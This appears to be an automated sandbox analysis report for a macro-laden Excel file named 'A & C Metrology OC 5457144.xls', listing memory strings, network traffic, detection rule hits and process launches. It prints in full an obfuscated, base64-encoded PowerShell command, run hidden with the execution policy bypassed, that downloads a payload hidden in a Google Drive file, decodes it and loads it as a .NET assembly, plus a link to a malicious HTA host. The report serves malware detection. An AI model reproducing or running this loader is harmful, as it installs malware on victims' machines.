Source: powershell.exe, 00000005.00000002.458032894.0000000002151000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.517859410.00000000022D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.488335048.00000000021B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.539375393.0000000002651000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: mshta.exe, 00000004.00000002.429202754.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427837795.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.479057196.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477308405.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479334056.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477231020.000000000041F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: mshta.exe, 00000004.00000002.429202754.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427837795.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471336990.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472164443.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.479057196.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477308405.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479334056.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479481738.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477231020.000000000041F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 00000005.00000002.473261807.0000000012181000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.473261807.0000000012181000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.473261807.0000000012181000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000E.00000002.517859410.00000000024D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.539375393.0000000002852000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com
Source: powershell.exe, 0000001B.00000002.539375393.0000000002651000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6
Source: powershell.exe, 0000001B.00000002.539375393.0000000002852000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
Source: powershell.exe, 0000000E.00000002.517859410.0000000002697000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.539375393.0000000002A17000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com
Source: powershell.exe, 0000000E.00000002.517859410.0000000002697000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.539375393.0000000002A17000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download
Source: powershell.exe, 00000005.00000002.473261807.0000000012181000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: mshta.exe, 00000004.00000002.429202754.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427837795.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472164443.0000000003C08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471336990.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472164443.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.479057196.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477308405.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479481738.0000000003C08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477231020.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479317402.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479334056.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479481738.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477231020.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471336990.0000000003C08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: mshta.exe, 00000004.00000003.426419047.0000000000328000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.428563336.0000000000328000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427286039.0000000000328000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472164443.0000000003C08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.479057196.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477308405.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479481738.0000000003C08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479334056.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477231020.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471336990.0000000003C08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://u4u.kids/
Source: mshta.exe, 00000004.00000003.427837795.000000000335C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429202754.000000000335C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://u4u.kids/K
Source: mshta.exe, 0000000F.00000002.479317402.00000000003BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471336990.0000000003C08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472164443.0000000003BE0000.00000004.00000020.00020000.00000000.sdmp, A & C Metrology OC 5457144.xls, 54330000.0.dr String found in binary or memory: https://u4u.kids/LUSVbx?&trinket=nice&dynamo=quizzical&job=uppity&imagination=modern&flute=boiling&S
Source: mshta.exe, 00000004.00000003.427837795.000000000335C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429202754.000000000335C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://u4u.kids/b
Source: mshta.exe, 0000000F.00000003.477231020.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479317402.00000000003D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://u4u.kids/nt
Source: unknown Network traffic detected: HTTP traffic on port 49161 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown Network traffic detected: HTTP traffic on port 49163 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49163
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49173
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49161
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49166 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49173 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49174 -> 443
Source: unknown HTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49161 version: TLS 1.2
Source: unknown HTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49163 version: TLS 1.2
Source: unknown HTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49169 version: TLS 1.2
Source: unknown HTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49168 version: TLS 1.2
Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior

System Summary

barindex
Source: Process Memory Space: powershell.exe PID: 204, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 3900, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: A & C Metrology OC 5457144.xls OLE: Microsoft Excel 2007+
Source: A & C Metrology OC 5457144.xls OLE: Microsoft Excel 2007+
Source: A & C Metrology OC 5457144.xls OLE: Microsoft Excel 2007+
Source: 54330000.0.dr OLE: Microsoft Excel 2007+
Source: 54330000.0.dr OLE: Microsoft Excel 2007+
Source: 54330000.0.dr OLE: Microsoft Excel 2007+
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\uwantskillthingstobegreatthingswitheveryonewithuthat[1].hta Jump to behavior
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRlTnY6Y29tU3BlQ1s0LDE1LDI1XS1qb2luJycpICggKCgnRzJOaW1hZ2VVcmwgPSBtODdodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VScrJ2hCWXd1ciBtODc7RzJOd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtHMk5pbWFnZUJ5dGVzID0gRzJOd2ViQ2xpZW50LkRvd25sb2FkRGF0YShHMk5pbWFnZVVybCk7RzJOaW1hZ2UnKydUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaScrJ25nXTo6VVRGOC5HZXRTdHJpbmcoRzJOaW1hZ2VCeXRlJysncyk7RzJOc3RhcnRGbGFnID0gbTg3PDxCQVNFNjRfU1RBUlQ+Pm04NztHMk5lbmRGbGFnID0gbTg3PDxCQVNFNjRfRU5EPj5tJysnODc7RzJOc3RhcnRJbmRleCcrJyA9ICcrJ0cyTmltJysnYWdlVGV4dC5JbmRleE9mKEcyTnN0YXJ0RmxhZyk7RzJOZW5kSW5kZXggPSBHMk5pbWFnZVRleHQnKycuSW5kZXhPZicrJyhHMk5lbmRGbGFnKTtHMk5zdGFydEluZCcrJ2V4ICcrJy1nZSAwIC1hbmQnKycgRzJOZW5kSW5kZXggLWd0IEcyTnN0YXJ0SW5kZXg7RzJOc3RhcnRJbmRleCArPSBHMk5zdGFydEZsYWcuTGUnKyduZ3RoO0cyTmJhc2U2NExlbmd0aCA9IEcyTmVuZEluZGV4IC0gRzJOc3RhcnRJbmRleDtHMk5iYXNlNjRDJysnb21tYW5kID0gRzJOaW1hZ2VUZXh0LicrJ1N1YnN0cmluZyhHMk5zdCcrJ2FydEluJysnZGV4LCBHMk5iYXNlNjRMZW5nJysndGgpO0cyTmJhc2U2NFJldmUnKydyc2VkID0gLWpvaW4nKycgKEcyTmInKydhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSAnKydDSUsgRm9yRWFjaC1PYmplY3QgeyBHMk5fIH0pWy0xLi4tKEcyTmJhc2U2NENvbW1hbmQuTGVuZ3RoKV0nKyc7RzJOY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0cmluZyhHMk5iYXNlNjRSZXZlcnNlZCk7RzJObG9hZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdCcrJ2VtLlJlZmxlY3Rpb24uQXMnKydzZW1ibHldOjpMb2FkKEcyTmNvbW1hbmRCeXRlcyk7RzJOdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChtODdWQUltODcpO0cyTnZhaU1ldGhvZC5JbnZva2UoRzJObnVsbCwgQChtODd0eHQuUkRGRlJFJysnLzA0NScrJy84LjUxMi4wMTIuMjkxLy86cHR0aG04NywgbTg3ZGUnKydzYXRpdmFkb204NywgbScrJzg3ZGVzYXRpdmEnKydkb204NywgbTg3ZGVzYXRpdmFkb204NywgbTg3QWRkSW5Qcm9jZXNzMzJtODcsIG04JysnN2Rlc2F0aXZhZG9tODcsIG04JysnN2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGl2YWRvbTg3LG04N2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGknKyd2YWRvbTg3LG04NzFtODcsbTg3ZGVzYXRpdmFkb204NykpOycpIC1SRVBMYUNFKFtDSEFyXTcxK1tDSEFyXTUwK1tDSEFyXTc4KSxbQ0hBcl0zNi1SRVBMYUNFJ204NycsW0NIQXJdMzktQ3JlcExBY0UgIChbQ0hBcl02NytbQ0hBcl03MytbQ0hBcl03NSksW0NIQXJdMTI0KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRlTnY6Y29tU3BlQ1s0LDE1LDI1XS1qb2luJycpICggKCgnRzJOaW1hZ2VVcmwgPSBtODdodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VScrJ2hCWXd1ciBtODc7RzJOd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtHMk5pbWFnZUJ5dGVzID0gRzJOd2ViQ2xpZW50LkRvd25sb2FkRGF0YShHMk5pbWFnZVVybCk7RzJOaW1hZ2UnKydUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaScrJ25nXTo6VVRGOC5HZXRTdHJpbmcoRzJOaW1hZ2VCeXRlJysncyk7RzJOc3RhcnRGbGFnID0gbTg3PDxCQVNFNjRfU1RBUlQ+Pm04NztHMk5lbmRGbGFnID0gbTg3PDxCQVNFNjRfRU5EPj5tJysnODc7RzJOc3RhcnRJbmRleCcrJyA9ICcrJ0cyTmltJysnYWdlVGV4dC5JbmRleE9mKEcyTnN0YXJ0RmxhZyk7RzJOZW5kSW5kZXggPSBHMk5pbWFnZVRleHQnKycuSW5kZXhPZicrJyhHMk5lbmRGbGFnKTtHMk5zdGFydEluZCcrJ2V4ICcrJy1nZSAwIC1hbmQnKycgRzJOZW5kSW5kZXggLWd0IEcyTnN0YXJ0SW5kZXg7RzJOc3RhcnRJbmRleCArPSBHMk5zdGFydEZsYWcuTGUnKyduZ3RoO0cyTmJhc2U2NExlbmd0aCA9IEcyTmVuZEluZGV4IC0gRzJOc3RhcnRJbmRleDtHMk5iYXNlNjRDJysnb21tYW5kID0gRzJOaW1hZ2VUZXh0LicrJ1N1YnN0cmluZyhHMk5zdCcrJ2FydEluJysnZGV4LCBHMk5iYXNlNjRMZW5nJysndGgpO0cyTmJhc2U2NFJldmUnKydyc2VkID0gLWpvaW4nKycgKEcyTmInKydhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSAnKydDSUsgRm9yRWFjaC1PYmplY3QgeyBHMk5fIH0pWy0xLi4tKEcyTmJhc2U2NENvbW1hbmQuTGVuZ3RoKV0nKyc7RzJOY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0cmluZyhHMk5iYXNlNjRSZXZlcnNlZCk7RzJObG9hZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdCcrJ2VtLlJlZmxlY3Rpb24uQXMnKydzZW1ibHldOjpMb2FkKEcyTmNvbW1hbmRCeXRlcyk7RzJOdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChtODdWQUltODcpO0cyTnZhaU1ldGhvZC5JbnZva2UoRzJObnVsbCwgQChtODd0eHQuUkRGRlJFJysnLzA0NScrJy84LjUxMi4wMTIuMjkxLy86cHR0aG04NywgbTg3ZGUnKydzYXRpdmFkb204NywgbScrJzg3ZGVzYXRpdmEnKydkb204NywgbTg3ZGVzYXRpdmFkb204NywgbTg3QWRkSW5Qcm9jZXNzMzJtODcsIG04JysnN2Rlc2F0aXZhZG9tODcsIG04JysnN2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGl2YWRvbTg3LG04N2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGknKyd2YWRvbTg3LG04NzFtODcsbTg3ZGVzYXRpdmFkb204NykpOycpIC1SRVBMYUNFKFtDSEFyXTcxK1tDSEFyXTUwK1tDSEFyXTc4KSxbQ0hBcl0zNi1SRVBMYUNFJ204NycsW0NIQXJdMzktQ3JlcExBY0UgIChbQ0hBcl02NytbQ0hBcl03MytbQ0hBcl03NSksW0NIQXJdMTI0KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRlTnY6Y29tU3BlQ1s0LDE1LDI1XS1qb2luJycpICggKCgnRzJOaW1hZ2VVcmwgPSBtODdodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VScrJ2hCWXd1ciBtODc7RzJOd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtHMk5pbWFnZUJ5dGVzID0gRzJOd2ViQ2xpZW50LkRvd25sb2FkRGF0YShHMk5pbWFnZVVybCk7RzJOaW1hZ2UnKydUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaScrJ25nXTo6VVRGOC5HZXRTdHJpbmcoRzJOaW1hZ2VCeXRlJysncyk7RzJOc3RhcnRGbGFnID0gbTg3PDxCQVNFNjRfU1RBUlQ+Pm04NztHMk5lbmRGbGFnID0gbTg3PDxCQVNFNjRfRU5EPj5tJysnODc7RzJOc3RhcnRJbmRleCcrJyA9ICcrJ0cyTmltJysnYWdlVGV4dC5JbmRleE9mKEcyTnN0YXJ0RmxhZyk7RzJOZW5kSW5kZXggPSBHMk5pbWFnZVRleHQnKycuSW5kZXhPZicrJyhHMk5lbmRGbGFnKTtHMk5zdGFydEluZCcrJ2V4ICcrJy1nZSAwIC1hbmQnKycgRzJOZW5kSW5kZXggLWd0IEcyTnN0YXJ0SW5kZXg7RzJOc3RhcnRJbmRleCArPSBHMk5zdGFydEZsYWcuTGUnKyduZ3RoO0cyTmJhc2U2NExlbmd0aCA9IEcyTmVuZEluZGV4IC0gRzJOc3RhcnRJbmRleDtHMk5iYXNlNjRDJysnb21tYW5kID0gRzJOaW1hZ2VUZXh0LicrJ1N1YnN0cmluZyhHMk5zdCcrJ2FydEluJysnZGV4LCBHMk5iYXNlNjRMZW5nJysndGgpO0cyTmJhc2U2NFJldmUnKydyc2VkID0gLWpvaW4nKycgKEcyTmInKydhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSAnKydDSUsgRm9yRWFjaC1PYmplY3QgeyBHMk5fIH0pWy0xLi4tKEcyTmJhc2U2NENvbW1hbmQuTGVuZ3RoKV0nKyc7RzJOY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0cmluZyhHMk5iYXNlNjRSZXZlcnNlZCk7RzJObG9hZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdCcrJ2VtLlJlZmxlY3Rpb24uQXMnKydzZW1ibHldOjpMb2FkKEcyTmNvbW1hbmRCeXRlcyk7RzJOdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChtODdWQUltODcpO0cyTnZhaU1ldGhvZC5JbnZva2UoRzJObnVsbCwgQChtODd0eHQuUkRGRlJFJysnLzA0NScrJy84LjUxMi4wMTIuMjkxLy86cHR0aG04NywgbTg3ZGUnKydzYXRpdmFkb204NywgbScrJzg3ZGVzYXRpdmEnKydkb204NywgbTg3ZGVzYXRpdmFkb204NywgbTg3QWRkSW5Qcm9jZXNzMzJtODcsIG04JysnN2Rlc2F0aXZhZG9tODcsIG04JysnN2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGl2YWRvbTg3LG04N2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGknKyd2YWRvbTg3LG04NzFtODcsbTg3ZGVzYXRpdmFkb204NykpOycpIC1SRVBMYUNFKFtDSEFyXTcxK1tDSEFyXTUwK1tDSEFyXTc4KSxbQ0hBcl0zNi1SRVBMYUNFJ204NycsW0NIQXJdMzktQ3JlcExBY0UgIChbQ0hBcl02NytbQ0hBcl03MytbQ0hBcl03NSksW0NIQXJdMTI0KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRlTnY6Y29tU3BlQ1s0LDE1LDI1XS1qb2luJycpICggKCgnRzJOaW1hZ2VVcmwgPSBtODdodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VScrJ2hCWXd1ciBtODc7RzJOd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtHMk5pbWFnZUJ5dGVzID0gRzJOd2ViQ2xpZW50LkRvd25sb2FkRGF0YShHMk5pbWFnZVVybCk7RzJOaW1hZ2UnKydUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaScrJ25nXTo6VVRGOC5HZXRTdHJpbmcoRzJOaW1hZ2VCeXRlJysncyk7RzJOc3RhcnRGbGFnID0gbTg3PDxCQVNFNjRfU1RBUlQ+Pm04NztHMk5lbmRGbGFnID0gbTg3PDxCQVNFNjRfRU5EPj5tJysnODc7RzJOc3RhcnRJbmRleCcrJyA9ICcrJ0cyTmltJysnYWdlVGV4dC5JbmRleE9mKEcyTnN0YXJ0RmxhZyk7RzJOZW5kSW5kZXggPSBHMk5pbWFnZVRleHQnKycuSW5kZXhPZicrJyhHMk5lbmRGbGFnKTtHMk5zdGFydEluZCcrJ2V4ICcrJy1nZSAwIC1hbmQnKycgRzJOZW5kSW5kZXggLWd0IEcyTnN0YXJ0SW5kZXg7RzJOc3RhcnRJbmRleCArPSBHMk5zdGFydEZsYWcuTGUnKyduZ3RoO0cyTmJhc2U2NExlbmd0aCA9IEcyTmVuZEluZGV4IC0gRzJOc3RhcnRJbmRleDtHMk5iYXNlNjRDJysnb21tYW5kID0gRzJOaW1hZ2VUZXh0LicrJ1N1YnN0cmluZyhHMk5zdCcrJ2FydEluJysnZGV4LCBHMk5iYXNlNjRMZW5nJysndGgpO0cyTmJhc2U2NFJldmUnKydyc2VkID0gLWpvaW4nKycgKEcyTmInKydhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSAnKydDSUsgRm9yRWFjaC1PYmplY3QgeyBHMk5fIH0pWy0xLi4tKEcyTmJhc2U2NENvbW1hbmQuTGVuZ3RoKV0nKyc7RzJOY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0cmluZyhHMk5iYXNlNjRSZXZlcnNlZCk7RzJObG9hZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdCcrJ2VtLlJlZmxlY3Rpb24uQXMnKydzZW1ibHldOjpMb2FkKEcyTmNvbW1hbmRCeXRlcyk7RzJOdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChtODdWQUltODcpO0cyTnZhaU1ldGhvZC5JbnZva2UoRzJObnVsbCwgQChtODd0eHQuUkRGRlJFJysnLzA0NScrJy84LjUxMi4wMTIuMjkxLy86cHR0aG04NywgbTg3ZGUnKydzYXRpdmFkb204NywgbScrJzg3ZGVzYXRpdmEnKydkb204NywgbTg3ZGVzYXRpdmFkb204NywgbTg3QWRkSW5Qcm9jZXNzMzJtODcsIG04JysnN2Rlc2F0aXZhZG9tODcsIG04JysnN2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGl2YWRvbTg3LG04N2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGknKyd2YWRvbTg3LG04NzFtODcsbTg3ZGVzYXRpdmFkb204NykpOycpIC1SRVBMYUNFKFtDSEFyXTcxK1tDSEFyXTUwK1tDSEFyXTc4KSxbQ0hBcl0zNi1SRVBMYUNFJ204NycsW0NIQXJdMzktQ3JlcExBY0UgIChbQ0hBcl02NytbQ0hBcl03MytbQ0hBcl03NSksW0NIQXJdMTI0KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_000007FE88F204B8 5_2_000007FE88F204B8
Source: A & C Metrology OC 5457144.xls OLE indicator, VBA macros: true
Source: A & C Metrology OC 5457144.xls Stream path 'MBD0026E5D6/\x1Ole' : https://u4u.kids/LUSVbx?&trinket=nice&dynamo=quizzical&job=uppity&imagination=modern&flute=boiling&SUV=motionless&specific=troubled&skyscraper=uninterested&bottlingPgPo]RcYh6ze9_VNS+,vnXeoYkbU1jEboSE5JkrKyn157wixguzleFEArdkKcmIoWrmxUgyeXYtvZrCsnOn0Klj1Hxipqfv2KfCKhpGM3DDU0azxuzqG6B8r8Ao5i0QerwgM`EkU%R]2Cz
Source: 54330000.0.dr Stream path 'MBD0026E5D6/\x1Ole' : https://u4u.kids/LUSVbx?&trinket=nice&dynamo=quizzical&job=uppity&imagination=modern&flute=boiling&SUV=motionless&specific=troubled&skyscraper=uninterested&bottlingPgPo]RcYh6ze9_VNS+,vnXeoYkbU1jEboSE5JkrKyn157wixguzleFEArdkKcmIoWrmxUgyeXYtvZrCsnOn0Klj1Hxipqfv2KfCKhpGM3DDU0azxuzqG6B8r8Ao5i0QerwgM`EkU%R]2Cz
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 2318
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 2318
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 2318 Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 2318
Source: Process Memory Space: powershell.exe PID: 204, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 3900, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
